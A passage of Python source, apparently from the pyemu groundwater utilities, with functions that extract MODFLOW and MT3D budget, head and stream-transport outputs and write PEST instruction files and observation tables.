{ord(s): None for s in ["(", ")", "/", "="]}
):
if prefix == "":
obsnme = "{0}_{1}".format(col, dt)
else:
obsnme = "{0}_{1}_{2}".format(prefix, col, dt)
f.write(" w !{0}!".format(obsnme))
f.write("\n")
def apply_mtlist_budget_obs(
list_filename,
gw_filename="mtlist_gw.dat",
sw_filename="mtlist_sw.dat",
start_datetime="1-1-1970",
):
"""process an MT3D-USGS list file to extract mass budget entries.
Args:
list_filename (`str`): the path and name of an existing MT3D-USGS list file
gw_filename (`str`, optional): the name of the output file with gw mass
budget information. Default is "mtlist_gw.dat"
sw_filename (`str`): the name of the output file with sw mass budget information.
Default is "mtlist_sw.dat"
        start_datetime (`str`): a str that can be cast to a pandas.TimeStamp. Used to give
observations a meaningful name
Returns:
2-element tuple containing
- **pandas.DataFrame**: the gw mass budget dataframe
- **pandas.DataFrame**: (optional) the sw mass budget dataframe.
If the SFT process is not active, this returned value is `None`.
Note:
This is the companion function of `gw_utils.setup_mtlist_budget_obs()`.
"""
try:
import flopy
except Exception as e:
raise Exception("error import flopy: {0}".format(str(e)))
mt = flopy.utils.MtListBudget(list_filename)
gw, sw = mt.parse(start_datetime=start_datetime, diff=True)
gw = gw.drop(
[
col
for col in gw.columns
for drop_col in ["kper", "kstp", "tkstp"]
if (col.lower().startswith(drop_col))
],
axis=1,
)
gw.to_csv(gw_filename, sep=" ", index_label="datetime", date_format="%Y%m%d")
if sw is not None:
sw = sw.drop(
[
col
for col in sw.columns
for drop_col in ["kper", "kstp", "tkstp"]
if (col.lower().startswith(drop_col))
],
axis=1,
)
sw.to_csv(sw_filename, sep=" ", index_label="datetime", date_format="%Y%m%d")
return gw, sw
def setup_mflist_budget_obs(
list_filename,
flx_filename="flux.dat",
vol_filename="vol.dat",
start_datetime="1-1'1970",
prefix="",
save_setup_file=False,
specify_times=None,
):
"""setup observations of budget volume and flux from modflow list file.
Args:
list_filename (`str`): path and name of the existing modflow list file
flx_filename (`str`, optional): output filename that will contain the budget flux
observations. Default is "flux.dat"
vol_filename (`str`, optional): output filename that will contain the budget volume
observations. Default is "vol.dat"
start_datetime (`str`, optional): a string that can be parsed into a pandas.TimeStamp.
This is used to give budget observations meaningful names. Default is "1-1-1970".
prefix (`str`, optional): a prefix to add to the water budget observations. Useful if
processing more than one list file as part of the forward run process. Default is ''.
save_setup_file (`bool`): a flag to save "_setup_"+ `list_filename` +".csv" file that contains useful
control file information
specify_times (`np.ndarray`-like, optional): An array of times to
extract from the budget dataframes returned by the flopy
MfListBudget(list_filename).get_dataframe() method. This can be
useful to ensure consistent observation times for PEST.
            Array needs to be alignable with the index of the dataframe
            returned by the flopy method; care should be taken to ensure that
            this is the case. If passed, it will be written to
"budget_times.config" file as strings to be read by the companion
`apply_mflist_budget_obs()` method at run time.
Returns:
**pandas.DataFrame**: a dataframe with information for constructing a control file.
Note:
This method writes instruction files and also a _setup_.csv to use when constructing a pest
control file. The instruction files are named <flux_file>.ins and <vol_file>.ins, respectively
It is recommended to use the default values for flux_file and vol_file.
This is the companion function of `gw_utils.apply_mflist_budget_obs()`.
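    Example:
        A minimal setup sketch; the MODFLOW list file name is a placeholder::

            import pyemu
            df = pyemu.gw_utils.setup_mflist_budget_obs(
                "model.list", start_datetime="1-1-1970")
            # "flux.dat.ins" and "vol.dat.ins" are written for the control file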
"""
flx, vol = apply_mflist_budget_obs(
list_filename, flx_filename, vol_filename, start_datetime, times=specify_times
)
_write_mflist_ins(flx_filename + ".ins", flx, prefix + "flx")
_write_mflist_ins(vol_filename + ".ins", vol, prefix + "vol")
df = try_process_output_file(flx_filename + ".ins")
if df is None:
raise Exception("error processing flux instruction file")
df2 = try_process_output_file(vol_filename + ".ins")
if df2 is None:
raise Exception("error processing volume instruction file")
df = df.append(df2)
df.loc[:, "obsnme"] = df.index.values
if save_setup_file:
df.to_csv("_setup_" + os.path.split(list_filename)[-1] + ".csv", index=False)
if specify_times is not None:
np.savetxt(
os.path.join(os.path.dirname(flx_filename), "budget_times.config"),
specify_times,
fmt="%s",
)
return df
def apply_mflist_budget_obs(
list_filename,
flx_filename="flux.dat",
vol_filename="vol.dat",
start_datetime="1-1-1970",
times=None,
):
"""process a MODFLOW list file to extract flux and volume water budget
entries.
Args:
list_filename (`str`): path and name of the existing modflow list file
flx_filename (`str`, optional): output filename that will contain the
budget flux observations. Default is "flux.dat"
vol_filename (`str`, optional): output filename that will contain the
budget volume observations. Default is "vol.dat"
start_datetime (`str`, optional): a string that can be parsed into a
pandas.TimeStamp. This is used to give budget observations
meaningful names. Default is "1-1-1970".
times (`np.ndarray`-like or `str`, optional): An array of times to
extract from the budget dataframes returned by the flopy
MfListBudget(list_filename).get_dataframe() method. This can be
useful to ensure consistent observation times for PEST.
If type `str`, will assume `times=filename` and attempt to read
single vector (no header or index) from file, parsing datetime
            using pandas. Array needs to be alignable with the index of the dataframe
            returned by the flopy method; care should be taken to ensure that
this is the case. If setup with `setup_mflist_budget_obs()`
specifying `specify_times` argument `times` should be set to
"budget_times.config".
Note:
This is the companion function of `gw_utils.setup_mflist_budget_obs()`.
Returns:
tuple containing
- **pandas.DataFrame**: a dataframe with flux budget information
- **pandas.DataFrame**: a dataframe with cumulative budget information
"""
try:
import flopy
except Exception as e:
raise Exception("error import flopy: {0}".format(str(e)))
mlf = flopy.utils.MfListBudget(list_filename)
flx, vol = mlf.get_dataframes(start_datetime=start_datetime, diff=True)
if times is not None:
if isinstance(times, str):
if vol.index.tzinfo:
parse_date = {"t": [0]}
names = [None]
else:
parse_date = False
names = ["t"]
times = pd.read_csv(
times, header=None, names=names, parse_dates=parse_date
)["t"].values
flx = flx.loc[times]
vol = vol.loc[times]
flx.to_csv(flx_filename, sep=" ", index_label="datetime", date_format="%Y%m%d")
vol.to_csv(vol_filename, sep=" ", index_label="datetime", date_format="%Y%m%d")
return flx, vol
def _write_mflist_ins(ins_filename, df, prefix):
"""write an instruction file for a MODFLOW list file"""
dt_str = df.index.map(lambda x: x.strftime("%Y%m%d"))
with open(ins_filename, "w") as f:
f.write("pif ~\nl1\n")
for dt in dt_str:
f.write("l1 ")
for col in df.columns:
obsnme = "{0}_{1}_{2}".format(prefix, col, dt)
f.write(" w !{0}!".format(obsnme))
f.write("\n")
def setup_hds_timeseries(
bin_file,
kij_dict,
prefix=None,
include_path=False,
model=None,
postprocess_inact=None,
text=None,
fill=None,
precision="single",
):
"""a function to setup a forward process to extract time-series style values
from a binary modflow binary file (or equivalent format - hds, ucn, sub, cbb, etc).
Args:
bin_file (`str`): path and name of existing modflow binary file - headsave, cell budget and MT3D UCN supported.
kij_dict (`dict`): dictionary of site_name: [k,i,j] pairs. For example: `{"wel1":[0,1,1]}`.
prefix (`str`, optional): string to prepend to site_name when forming observation names. Default is None
include_path (`bool`, optional): flag to setup the binary file processing in directory where the hds_file
is located (if different from where python is running). This is useful for setting up
the process in separate directory for where python is running.
model (`flopy.mbase`, optional): a `flopy.basemodel` instance. If passed, the observation names will
have the datetime of the observation appended to them (using the flopy `start_datetime` attribute.
If None, the observation names will have the zero-based stress period appended to them. Default is None.
postprocess_inact (`float`, optional): Inactive value in heads/ucn file e.g. mt.btn.cinit. If `None`, no
inactive value processing happens. Default is `None`.
text (`str`): the text record entry in the binary file (e.g. "constant_head").
Used to indicate that the binary file is a MODFLOW cell-by-cell budget file.
If None, headsave or MT3D unformatted concentration file
            is assumed. Default is None
fill (`float`): fill value for NaNs in the extracted timeseries dataframe. If
`None`, no filling is done, which may yield model run failures as the resulting
processed timeseries CSV file (produced at runtime) may have missing values and
            can't be processed with the corresponding instruction file. Default is `None`.
precision (`str`): the precision of the binary file. Can be "single" or "double".
Default is "single".
Returns:
tuple containing
- **str**: the forward run command to execute the binary file process during model runs.
- **pandas.DataFrame**: a dataframe of observation information for use in the pest control file
Note:
This function writes hds_timeseries.config that must be in the same
dir where `apply_hds_timeseries()` is called during the forward run
Assumes model time units are days
This is the companion function of `gw_utils.apply_hds_timeseries()`.
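    Example:
        A sketch monitoring two hypothetical cells in a head-save file; the file name
        and (k, i, j) indices are placeholders::

            import pyemu
            kij_dict = {"well1": (0, 10, 12), "well2": (1, 20, 44)}
            frun_line, df = pyemu.gw_utils.setup_hds_timeseries(
                "model.hds", kij_dict, prefix="hds")
            # frun_line is then added to the forward run script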
"""
try:
import flopy
except Exception as e:
print("error importing flopy, returning {0}".format(str(e)))
return
assert os.path.exists(bin_file), "binary file not found"
iscbc = False
if text is not None:
text = text.upper()
try:
# hack: if model is passed and its None, it trips up CellBudgetFile...
if model is not None:
bf = flopy.utils.CellBudgetFile(
bin_file, precision=precision, model=model
)
iscbc = True
else:
bf = flopy.utils.CellBudgetFile(bin_file, precision=precision)
iscbc = True
except Exception as e:
try:
if model is not None:
bf = flopy.utils.HeadFile(
bin_file, precision=precision, model=model, text=text
)
else:
bf = flopy.utils.HeadFile(bin_file, precision=precision, text=text)
except Exception as e1:
raise Exception(
"error instantiating binary file as either CellBudgetFile:{0} or as HeadFile with text arg: {1}".format(
str(e), str(e1)
)
)
if iscbc:
tl = [t.decode().strip() for t in bf.textlist]
if text not in tl:
raise Exception(
"'text' {0} not found in CellBudgetFile.textlist:{1}".format(
text, tl
)
)
elif bin_file.lower().endswith(".ucn"):
try:
bf = flopy.utils.UcnFile(bin_file, precision=precision)
except Exception as e:
raise Exception("error instantiating UcnFile:{0}".format(str(e)))
else:
try:
bf = flopy.utils.HeadFile(bin_file, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
if text is None:
text = "none"
nlay, nrow, ncol = bf.nlay, bf.nrow, bf.ncol
# if include_path:
# pth = os.path.join(*[p for p in os.path.split(hds_file)[:-1]])
# config_file = os.path.join(pth,"{0}_timeseries.config".format(hds_file))
# else:
config_file = "{0}_timeseries.config".format(bin_file)
print("writing config file to {0}".format(config_file))
if fill is None:
fill = "none"
f_config = open(config_file, "w")
if model is not None:
if model.dis.itmuni != 4:
warnings.warn(
"setup_hds_timeseries only supports 'days' time units...", PyemuWarning
)
f_config.write(
"{0},{1},d,{2},{3},{4},{5}\n".format(
os.path.split(bin_file)[-1],
model.start_datetime,
text,
fill,
precision,
iscbc,
)
)
start = pd.to_datetime(model.start_datetime)
else:
f_config.write(
"{0},none,none,{1},{2},{3},{4}\n".format(
os.path.split(bin_file)[-1], text, fill, precision, iscbc
)
)
f_config.write("site,k,i,j\n")
dfs = []
for site, (k, i, j) in kij_dict.items():
assert k >= 0 and k < nlay, k
assert i >= 0 and i < nrow, i
assert j >= 0 and j < ncol, j
site = site.lower().replace(" ", "")
if iscbc:
ts = bf.get_ts((k, i, j), text=text)
# print(ts)
df = pd.DataFrame(data=ts, columns=["totim", site])
else:
df = pd.DataFrame(data=bf.get_ts((k, i, j)), columns=["totim", site])
if model is not None:
dts = start + pd.to_timedelta(df.totim, unit="d")
df.loc[:, "totim"] = dts
# print(df)
f_config.write("{0},{1},{2},{3}\n".format(site, k, i, j))
df.index = df.pop("totim")
dfs.append(df)
f_config.close()
df = pd.concat(dfs, axis=1).T
df.to_csv(bin_file + "_timeseries.processed", sep=" ")
if model is not None:
t_str = df.columns.map(lambda x: x.strftime("%Y%m%d"))
else:
t_str = df.columns.map(lambda x: "{0:08.2f}".format(x))
ins_file = bin_file + "_timeseries.processed.ins"
print("writing instruction file to {0}".format(ins_file))
with open(ins_file, "w") as f:
f.write("pif ~\n")
f.write("l1 \n")
for site in df.index:
# for t in t_str:
f.write("l1 w ")
# for site in df.columns:
for t in t_str:
if prefix is not None:
obsnme = "{0}_{1}_{2}".format(prefix, site, t)
else:
obsnme = "{0}_{1}".format(site, t)
f.write(" !{0}!".format(obsnme))
f.write("\n")
if postprocess_inact is not None:
_setup_postprocess_hds_timeseries(
bin_file, df, config_file, prefix=prefix, model=model
)
bd = "."
if include_path:
bd = os.getcwd()
pth = os.path.join(*[p for p in os.path.split(bin_file)[:-1]])
os.chdir(pth)
config_file = os.path.split(config_file)[-1]
try:
df = apply_hds_timeseries(config_file, postprocess_inact=postprocess_inact)
except Exception as e:
os.chdir(bd)
raise Exception("error in apply_hds_timeseries(): {0}".format(str(e)))
os.chdir(bd)
df = try_process_output_file(ins_file)
if df is None:
raise Exception("error processing {0} instruction file".format(ins_file))
df.loc[:, "weight"] = 0.0
if prefix is not None:
df.loc[:, "obgnme"] = df.index.map(lambda x: "_".join(x.split("_")[:2]))
else:
df.loc[:, "obgnme"] = df.index.map(lambda x: x.split("_")[0])
frun_line = "pyemu.gw_utils.apply_hds_timeseries('{0}',{1})\n".format(
config_file, postprocess_inact
)
return frun_line, df
def apply_hds_timeseries(config_file=None, postprocess_inact=None):
"""process a modflow binary file using a previously written
configuration file
Args:
config_file (`str`, optional): configuration file written by `pyemu.gw_utils.setup_hds_timeseries`.
If `None`, looks for `hds_timeseries.config`
postprocess_inact (`float`, optional): Inactive value in heads/ucn file e.g. mt.btn.cinit. If `None`, no
inactive value processing happens. Default is `None`.
Note:
This is the companion function of `gw_utils.setup_hds_timeseries()`.
"""
import flopy
if config_file is None:
config_file = "hds_timeseries.config"
assert os.path.exists(config_file), config_file
with open(config_file, "r") as f:
line = f.readline()
(
bf_file,
start_datetime,
time_units,
text,
fill,
precision,
_iscbc,
) = line.strip().split(",")
if len(line.strip().split(",")) == 6:
(
bf_file,
start_datetime,
time_units,
text,
fill,
precision,
) = line.strip().split(",")
_iscbc = "false"
else:
(
bf_file,
start_datetime,
time_units,
text,
fill,
precision,
_iscbc,
) = line.strip().split(",")
site_df = pd.read_csv(f)
text = text.upper()
if _iscbc.lower().strip() == "false":
iscbc = False
elif _iscbc.lower().strip() == "true":
iscbc = True
else:
raise Exception(
"apply_hds_timeseries() error: unrecognized 'iscbc' string in config file: {0}".format(
_iscbc
)
)
assert os.path.exists(bf_file), "head save file not found"
if iscbc:
try:
bf = flopy.utils.CellBudgetFile(bf_file, precision=precision)
except Exception as e:
raise Exception("error instantiating CellBudgetFile:{0}".format(str(e)))
elif bf_file.lower().endswith(".ucn"):
try:
bf = flopy.utils.UcnFile(bf_file, precision=precision)
except Exception as e:
raise Exception("error instantiating UcnFile:{0}".format(str(e)))
else:
try:
if text != "NONE":
bf = flopy.utils.HeadFile(bf_file, text=text, precision=precision)
else:
bf = flopy.utils.HeadFile(bf_file, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
nlay, nrow, ncol = bf.nlay, bf.nrow, bf.ncol
dfs = []
for site, k, i, j in zip(site_df.site, site_df.k, site_df.i, site_df.j):
assert k >= 0 and k < nlay
assert i >= 0 and i < nrow
assert j >= 0 and j < ncol
if iscbc:
df = pd.DataFrame(
data=bf.get_ts((k, i, j), text=text), columns=["totim", site]
)
else:
df = pd.DataFrame(data=bf.get_ts((k, i, j)), columns=["totim", site])
df.index = df.pop("totim")
dfs.append(df)
df = pd.concat(dfs, axis=1).T
if df.shape != df.dropna().shape:
warnings.warn("NANs in processed timeseries file", PyemuWarning)
if fill.upper() != "NONE":
fill = float(fill)
df.fillna(fill, inplace=True)
# print(df)
df.to_csv(bf_file + "_timeseries.processed", sep=" ")
if postprocess_inact is not None:
_apply_postprocess_hds_timeseries(config_file, postprocess_inact)
return df
def _setup_postprocess_hds_timeseries(
hds_file, df, config_file, prefix=None, model=None
):
"""Dirty function to setup post processing concentrations in inactive/dry cells"""
warnings.warn(
"Setting up post processing of hds or ucn timeseries obs. "
"Prepending 'pp' to obs name may cause length to exceed 20 chars",
PyemuWarning,
)
if model is not None:
t_str = df.columns.map(lambda x: x.strftime("%Y%m%d"))
else:
t_str = df.columns.map(lambda x: "{0:08.2f}".format(x))
if prefix is not None:
prefix = "pp{0}".format(prefix)
else:
prefix = "pp"
ins_file = hds_file + "_timeseries.post_processed.ins"
print("writing instruction file to {0}".format(ins_file))
with open(ins_file, "w") as f:
f.write("pif ~\n")
f.write("l1 \n")
for site in df.index:
f.write("l1 w ")
# for site in df.columns:
for t in t_str:
obsnme = "{0}{1}_{2}".format(prefix, site, t)
f.write(" !{0}!".format(obsnme))
f.write("\n")
frun_line = "pyemu.gw_utils._apply_postprocess_hds_timeseries('{0}')\n".format(
config_file
)
return frun_line
def _apply_postprocess_hds_timeseries(config_file=None, cinact=1e30):
"""private function to post processing binary files"""
import flopy
if config_file is None:
config_file = "hds_timeseries.config"
assert os.path.exists(config_file), config_file
with open(config_file, "r") as f:
line = f.readline()
(
hds_file,
start_datetime,
time_units,
text,
fill,
precision,
_iscbc,
) = line.strip().split(",")
if len(line.strip().split(",")) == 6:
(
hds_file,
start_datetime,
time_units,
text,
fill,
precision,
) = line.strip().split(",")
_iscbc = "false"
else:
(
hds_file,
start_datetime,
time_units,
text,
fill,
precision,
_iscbc,
) = line.strip().split(",")
site_df = pd.read_csv(f)
# print(site_df)
text = text.upper()
assert os.path.exists(hds_file), "head save file not found"
if hds_file.lower().endswith(".ucn"):
try:
hds = flopy.utils.UcnFile(hds_file, precision=precision)
except Exception as e:
raise Exception("error instantiating UcnFile:{0}".format(str(e)))
else:
try:
if text != "NONE":
hds = flopy.utils.HeadFile(hds_file, text=text, precision=precision)
else:
hds = flopy.utils.HeadFile(hds_file, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
nlay, nrow, ncol = hds.nlay, hds.nrow, hds.ncol
dfs = []
for site, k, i, j in zip(site_df.site, site_df.k, site_df.i, site_df.j):
assert k >= 0 and k < nlay
assert i >= 0 and i < nrow
assert j >= 0 and j < ncol
if text.upper() != "NONE":
df = pd.DataFrame(data=hds.get_ts((k, i, j)), columns=["totim", site])
else:
df = pd.DataFrame(data=hds.get_ts((k, i, j)), columns=["totim", site])
df.index = df.pop("totim")
inact_obs = df[site].apply(lambda x: np.isclose(x, cinact))
if inact_obs.sum() > 0:
assert k + 1 < nlay, "Inactive observation in lowest layer"
df_lower = pd.DataFrame(
data=hds.get_ts((k + 1, i, j)), columns=["totim", site]
)
df_lower.index = df_lower.pop("totim")
df.loc[inact_obs] = df_lower.loc[inact_obs]
print(
"{0} observation(s) post-processed for site {1} at kij ({2},{3},{4})".format(
inact_obs.sum(), site, k, i, j
)
)
dfs.append(df)
df = pd.concat(dfs, axis=1).T
# print(df)
df.to_csv(hds_file + "_timeseries.post_processed", sep=" ")
return df
def setup_hds_obs(
hds_file,
kperk_pairs=None,
skip=None,
prefix="hds",
text="head",
precision="single",
include_path=False,
):
"""a function to setup using all values from a layer-stress period
pair for observations.
Args:
hds_file (`str`): path and name of an existing MODFLOW head-save file.
If the hds_file endswith 'ucn', then the file is treated as a UcnFile type.
        kperk_pairs ([(int,int)]): a list of length-two tuples which are pairs of kper
(zero-based stress period index) and k (zero-based layer index) to
setup observations for. If None, then all layers and stress period records
            found in the file will be used. Caution: this may produce a very large number of observations!
skip (variable, optional): a value or function used to determine which values
to skip when setting up observations. If np.scalar(skip)
is True, then values equal to skip will not be used.
            skip can also be a np.ndarray with dimensions equal to the model.
            Observations are set up only for cells with non-zero values in the array.
            If skip is neither an np.ndarray nor a scalar, it will be treated as a
            function that returns np.NaN if the value should be skipped.
prefix (`str`): the prefix to use for the observation names. default is "hds".
text (`str`): the text tag the flopy HeadFile instance. Default is "head"
        precision (`str`): the precision string for the flopy HeadFile instance. Default is "single"
include_path (`bool`, optional): flag to setup the binary file processing in directory where the hds_file
is located (if different from where python is running). This is useful for setting up
the process in separate directory for where python is running.
Returns:
tuple containing
- **str**: the forward run script line needed to execute the headsave file observation
operation
- **pandas.DataFrame**: a dataframe of pest control file information
Note:
        Writes an instruction file and a _setup_ csv used to construct a control file.
This is the companion function to `gw_utils.apply_hds_obs()`.
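    Example:
        A sketch observing layer 0 of stress period 0 only; the head-save file name
        and the skip value are placeholders::

            import pyemu
            fwd_run_line, df = pyemu.gw_utils.setup_hds_obs(
                "model.hds", kperk_pairs=[(0, 0)], skip=-999.0, prefix="hds")
            # fwd_run_line is then added to the forward run script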
"""
try:
import flopy
except Exception as e:
print("error importing flopy, returning {0}".format(str(e)))
return
assert os.path.exists(hds_file), "head save file not found"
if hds_file.lower().endswith(".ucn"):
try:
hds = flopy.utils.UcnFile(hds_file)
except Exception as e:
raise Exception("error instantiating UcnFile:{0}".format(str(e)))
elif text.lower() == "headu":
try:
hds = flopy.utils.HeadUFile(hds_file, text=text, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
else:
try:
hds = flopy.utils.HeadFile(hds_file, text=text, precision=precision)
except Exception as e:
raise Exception("error instantiating HeadFile:{0}".format(str(e)))
if kperk_pairs is None:
kperk_pairs = []
for kstp, kper in hds.kstpkper:
kperk_pairs.extend([(kper - 1, k) for k in range(hds.nlay)])
if len(kperk_pairs) == 2:
try:
if len(kperk_pairs[0]) == 2:
pass
except:
kperk_pairs = [kperk_pairs]
# if start_datetime is not None:
# start_datetime = pd.to_datetime(start_datetime)
# dts = start_datetime + pd.to_timedelta(hds.times,unit='d')
data = {}
kpers = [kper - 1 for kstp, kper in hds.kstpkper]
for kperk_pair in kperk_pairs:
kper, k = kperk_pair
assert kper in kpers, "kper not in hds:{0}".format(kper)
assert k in range(hds.nlay), "k not in hds:{0}".format(k)
kstp = last_kstp_from_kper(hds, kper)
d = hds.get_data(kstpkper=(kstp, kper))[k]
data["{0}_{1}".format(kper, k)] = d.flatten()
# data[(kper,k)] = d.flatten()
idx, iidx, jidx = [], [], []
for _ in range(len(data)):
for i in range(hds.nrow):
iidx.extend([i for _ in range(hds.ncol)])
jidx.extend([j for j in range(hds.ncol)])
idx.extend(["i{0:04d}_j{1:04d}".format(i, j) for j in range(hds.ncol)])
idx = idx[: hds.nrow * hds.ncol]
df = pd.DataFrame(data, index=idx)
data_cols = list(df.columns)
data_cols.sort()
# df.loc[:,"iidx"] = iidx
# df.loc[:,"jidx"] = jidx
if skip is not None:
for col in data_cols:
if np.isscalar(skip):
df.loc[df.loc[:, col] == skip, col] = np.NaN
elif isinstance(skip, np.ndarray):
assert (
skip.ndim >= 2
), "skip passed as {}D array, At least 2D (<= 4D) array required".format(
skip.ndim
)
assert skip.shape[-2:] == (
hds.nrow,
hds.ncol,
), "Array dimensions of arg. skip needs to match model dimensions ({0},{1}). ({2},{3}) passed".format(
hds.nrow, hds.ncol, skip.shape[-2], skip.shape[-1]
)
if skip.ndim == 2:
print(
"2D array passed for skip, assuming constant for all layers and kper"
)
skip = np.tile(skip, (len(kpers), hds.nlay, 1, 1))
if skip.ndim == 3:
print("3D array passed for skip, assuming constant for all kper")
skip = np.tile(skip, (len(kpers), 1, 1, 1))
kper, k = [int(c) for c in col.split("_")]
df.loc[
df.index.map(
lambda x: skip[
kper,
k,
int(x.split("_")[0].strip("i")),
int(x.split("_")[1].strip("j")),
]
== 0
),
col,
] = np.NaN
else:
df.loc[:, col] = df.loc[:, col].apply(skip)
# melt to long form
df = df.melt(var_name="kperk", value_name="obsval")
# set row and col identifies
df.loc[:, "iidx"] = iidx
df.loc[:, "jidx"] = jidx
# drop nans from skip
df = df.dropna()
# set some additional identifiers
df.loc[:, "kper"] = df.kperk.apply(lambda x: int(x.split("_")[0]))
df.loc[:, "kidx"] = df.pop("kperk").apply(lambda x: int(x.split("_")[1]))
# form obs names
# def get_kper_str(kper):
# if start_datetime is not None:
# return dts[int(kper)].strftime("%Y%m%d")
# else:
# return "kper{0:04.0f}".format(kper)
fmt = prefix + "_{0:02.0f}_{1:03.0f}_{2:03.0f}_{3:03.0f}"
# df.loc[:,"obsnme"] = df.apply(lambda x: fmt.format(x.kidx,x.iidx,x.jidx,
# get_kper_str(x.kper)),axis=1)
df.loc[:, "obsnme"] = df.apply(
lambda x: fmt.format(x.kidx, x.iidx, x.jidx, x.kper), axis=1
)
df.loc[:, "ins_str"] = df.obsnme.apply(lambda x: "l1 w !{0}!".format(x))
df.loc[:, "obgnme"] = prefix
# write the instruction file
with open(hds_file + ".dat.ins", "w") as f:
f.write("pif ~\nl1\n")
df.ins_str.to_string(f, index=False, header=False)
# write the corresponding output file
df.loc[:, ["obsnme", "obsval"]].to_csv(hds_file + ".dat", sep=" ", index=False)
hds_path = os.path.dirname(hds_file)
setup_file = os.path.join(
hds_path, "_setup_{0}.csv".format(os.path.split(hds_file)[-1])
)
df.to_csv(setup_file)
if not include_path:
hds_file = os.path.split(hds_file)[-1]
fwd_run_line = (
"pyemu.gw_utils.apply_hds_obs('{0}',precision='{1}',text='{2}')\n".format(
hds_file, precision, text
)
)
df.index = df.obsnme
return fwd_run_line, df
def last_kstp_from_kper(hds, kper):
"""function to find the last time step (kstp) for a
    given stress period (kper) in a modflow head save file.
Args:
hds (`flopy.utils.HeadFile`): head save file
kper (`int`): the zero-index stress period number
Returns:
**int**: the zero-based last time step during stress period
kper in the head save file
"""
# find the last kstp with this kper
kstp = -1
for kkstp, kkper in hds.kstpkper:
if kkper == kper + 1 and kkstp > kstp:
kstp = kkstp
if kstp == -1:
raise Exception("kstp not found for kper {0}".format(kper))
kstp -= 1
return kstp
def apply_hds_obs(hds_file, inact_abs_val=1.0e20, precision="single", text="head"):
"""process a modflow head save file. A companion function to
`gw_utils.setup_hds_obs()` that is called during the forward run process
Args:
hds_file (`str`): a modflow head save filename. if hds_file ends with 'ucn',
then the file is treated as a UcnFile type.
        inact_abs_val (`float`, optional): the value that marks the minimum and maximum
            active value. Values in the headsave file greater than `inact_abs_val` or less
than -`inact_abs_val` are reset to `inact_abs_val`
Returns:
**pandas.DataFrame**: a dataframe with extracted simulated values.
Note:
This is the companion function to `gw_utils.setup_hds_obs()`.
"""
try:
import flopy
except Exception as e:
raise Exception("apply_hds_obs(): error importing flopy: {0}".format(str(e)))
from .. import pst_utils
assert os.path.exists(hds_file)
out_file = hds_file + ".dat"
ins_file = out_file + ".ins"
assert os.path.exists(ins_file)
df = pd.DataFrame({"obsnme": pst_utils.parse_ins_file(ins_file)})
df.index = df.obsnme
    # populate metadata
items = ["k", "i", "j", "kper"]
for i, item in enumerate(items):
df.loc[:, item] = df.obsnme.apply(lambda x: int(x.split("_")[i + 1]))
if hds_file.lower().endswith("ucn"):
hds = flopy.utils.UcnFile(hds_file)
elif text.lower() == "headu":
hds = flopy.utils.HeadUFile(hds_file)
else:
hds = flopy.utils.HeadFile(hds_file, precision=precision, text=text)
kpers = df.kper.unique()
df.loc[:, "obsval"] = np.NaN
for kper in kpers:
kstp = last_kstp_from_kper(hds, kper)
data = hds.get_data(kstpkper=(kstp, kper))
# jwhite 15jan2018 fix for really large values that are getting some
# trash added to them...
if text.lower() != "headu":
data[np.isnan(data)] = 0.0
data[data > np.abs(inact_abs_val)] = np.abs(inact_abs_val)
data[data < -np.abs(inact_abs_val)] = -np.abs(inact_abs_val)
df_kper = df.loc[df.kper == kper, :]
df.loc[df_kper.index, "obsval"] = data[df_kper.k, df_kper.i, df_kper.j]
else:
df_kper = df.loc[df.kper == kper, :]
for k, d in enumerate(data):
d[np.isnan(d)] = 0.0
d[d > np.abs(inact_abs_val)] = np.abs(inact_abs_val)
d[d < -np.abs(inact_abs_val)] = -np.abs(inact_abs_val)
df_kperk = df_kper.loc[df_kper.k == k, :]
df.loc[df_kperk.index, "obsval"] = d[df_kperk.i]
assert df.dropna().shape[0] == df.shape[0]
df.loc[:, ["obsnme", "obsval"]].to_csv(out_file, index=False, sep=" ")
return df
def setup_sft_obs(sft_file, ins_file=None, start_datetime=None, times=None, ncomp=1):
"""writes a post-processor and instruction file for a mt3d-usgs sft output file
Args:
sft_file (`str`): path and name of an existing sft output file (ASCII)
ins_file (`str`, optional): the name of the instruction file to create.
If None, the name is `sft_file`+".ins". Default is `None`.
start_datetime (`str`): a pandas.to_datetime() compatible str. If not None,
then the resulting observation names have the datetime
suffix. If None, the suffix is the output totim. Default
is `None`.
times ([`float`]): a list of times to make observations for. If None, all times
found in the file are used. Default is None.
ncomp (`int`): number of components in transport model. Default is 1.
Returns:
**pandas.DataFrame**: a dataframe with observation names and values for the sft simulated
concentrations.
Note:
This is the companion function to `gw_utils.apply_sft_obs()`.
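    Example:
        A sketch for a hypothetical MT3D-USGS SFT output file, using all output times::

            import pyemu
            df = pyemu.gw_utils.setup_sft_obs("model.sft.out", start_datetime="1-1-1970")
            # "model.sft.out.processed.ins" is written for the control file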
"""
df = pd.read_csv(sft_file, skiprows=1, delim_whitespace=True)
df.columns = [c.lower().replace("-", "_") for c in df.columns]
if times is None:
times = df.time.unique()
missing = []
utimes = df.time.unique()
for t in times:
if t not in utimes:
missing.append(str(t))
if len(missing) > 0:
print(df.time)
raise Exception("the following times are missing:{0}".format(",".join(missing)))
with open("sft_obs.config", "w") as f:
f.write(sft_file + "\n")
[f.write("{0:15.6E}\n".format(t)) for t in times]
df = apply_sft_obs()
utimes = df.time.unique()
for t in times:
assert t in utimes, "time {0} missing in processed dataframe".format(t)
idx = df.time.apply(lambda x: x in times)
if start_datetime is not None:
start_datetime = pd.to_datetime(start_datetime)
df.loc[:, "time_str"] = pd.to_timedelta(df.time, unit="d") + start_datetime
df.loc[:, "time_str"] = df.time_str.apply(
lambda x: datetime.strftime(x, "%Y%m%d")
)
else:
df.loc[:, "time_str"] = df.time.apply(lambda x: "{0:08.2f}".format(x))
df.loc[:, "ins_str"] = "l1\n"
# check for multiple components
df_times = df.loc[idx, :]
df.loc[:, "icomp"] = 1
icomp_idx = list(df.columns).index("icomp")
for t in times:
df_time = df.loc[df.time == t, :].copy()
vc = df_time.sfr_node.value_counts()
ncomp = vc.max()
assert np.all(vc.values == ncomp)
nstrm = df_time.shape[0] / ncomp
for icomp in range(ncomp):
s = int(nstrm * (icomp))
e = int(nstrm * (icomp + 1))
idxs = df_time.iloc[s:e, :].index
# df_time.iloc[nstrm*(icomp):nstrm*(icomp+1),icomp_idx.loc["icomp"] = int(icomp+1)
